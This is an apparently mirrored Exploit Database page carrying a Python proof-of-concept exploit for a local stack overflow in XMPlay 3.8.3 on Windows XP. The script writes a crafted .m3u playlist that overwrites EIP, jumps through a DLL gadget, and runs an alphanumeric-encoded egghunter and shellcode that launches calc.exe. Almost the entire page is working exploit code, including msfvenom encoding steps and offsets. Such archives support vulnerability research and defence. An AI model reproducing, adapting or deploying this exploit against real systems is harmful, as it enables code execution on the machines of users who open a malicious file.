XMPlay 3.8.3 – ‘.m3u’ Local Stack Overflow Code Execution

• Exploit Database
• 40 阅读

• 作者： s7acktrac3
  日期： 2018-12-20
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46020/

• #!/usr/bin/env python
  # -*- coding: utf-8 -*-
  # Exploit Title: XMPlay 3.8.3 - '.m3u' Code Execution (PoC)
  # Date: 2018-12-19
  # Exploit Author: s7acktrac3
  # Vendor Homepage: https://www.xmplay.com/
  # Software Link: https://support.xmplay.com/files_view.php?file_id=676
  # Version: 3.8.3 (latest)
  # Tested on: Windows XP SP3
  # CVE : Reserved
  #
  # Developer notified & delivered PoC but not interested in fixing :P 
  #
  # Reproduction Steps:
  # Lauch XMPlay & run this PoC script - it will create a file in the same directory named xmplay.m3u
  # Either drag xmplay.m3u into the XMPlay window or File Menu-> select winamp.m3u. Application will "load"
  # for a minute (exploit searching through memory for payload) and eventually launch calc.exe 
  #
  # Major Shouts @Gokhan @foolsofsecurity for helping turn the DoS into Code execution & me into more of a 
  # beast!
   
  from struct import pack
  
  max_size = 728 
  # C:\Documents and Settings\Administrator\Desktop\Exploit Dev\xmplay_383-poc.py
  eip_offset = 500
  
  file_header= "#EXTM3U\n\r" 
  file_header += "#EXTINF:200,Sleep Away\n\r"
  file_header += "http://test." 
  
  # cat egghunter.txt | tr -d '"' | tr -d '\n' | tr -d '\\x' | xxd -r -p > egghunter.bin
  #msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=EDX -a x86 --platform Windows
  encoded_egg_hunter =(""
  "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a" 
  "\x4a\x4a\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
  "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50"
  "\x38\x41\x42\x75\x4a\x49\x62\x46\x6f\x71\x4b\x7a\x49\x6f\x44"
  "\x4f\x53\x72\x36\x32\x61\x7a\x46\x62\x66\x38\x78\x4d\x64\x6e"
  "\x75\x6c\x75\x55\x63\x6a\x54\x34\x68\x6f\x6d\x68\x63\x47\x34"
  "\x70\x54\x70\x72\x54\x4e\x6b\x58\x7a\x4e\x4f\x42\x55\x6b\x5a"
  "\x4c\x6f\x31\x65\x78\x67\x59\x6f\x39\x77\x41\x41")
  
  encoded_calc ="w00tw00t" + "\x57\x58\x04\x06\x50\x5E" # PUSH EDI, POP EAX, ADD AL,6, PUSH EAX, POP ESI
  encoded_calc += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49"
  encoded_calc += "\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51"
  encoded_calc += "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
  encoded_calc += "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
  encoded_calc += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
  encoded_calc += "\x4a\x49\x36\x51\x49\x59\x52\x71\x61\x78"
  encoded_calc += "\x75\x33\x50\x61\x72\x4c\x31\x73\x73\x64"
  encoded_calc += "\x6e\x58\x49\x57\x6a\x33\x39\x52\x64\x37"
  encoded_calc += "\x6b\x4f\x38\x50\x41\x41"
  
  egg_addr_to_edx= ""
  egg_addr_to_edx += "\x54" 				#PUSH ESP
  egg_addr_to_edx += "\x58" 				#POP EAX
  egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" #SUB EAX,5555553C
  egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" #SUB EAX,5555553C
  egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" #SUB EAX,5555553C
  egg_addr_to_edx += "\x50" 				#PUSH eax
  egg_addr_to_edx += "\x5A" 			#POP EDX
  
  
  payload= "A" * 12
  payload += encoded_calc
  payload += "A" * (eip_offset - len(payload))
  print "Length of payload " + str(len(payload)) 
  payload += pack("<L", 0x78196d4d) 			# Jmp esp OS DLL
  payload += "BBBB"
  payload += egg_addr_to_edx
  payload += "C" * (76- len(egg_addr_to_edx) )
  payload += encoded_egg_hunter
  payload += "C" * (max_size - len(payload)) 
  stupid_char = "|"
  
  print "[+] Creating .m3u file with payload size: "+ str(len(payload)) 
  exploit = file_header + payload + stupid_char
  file = open('xmplay.m3u','w')
  file.write(exploit)
  file.close(); 
  print "[+] Done creating the file"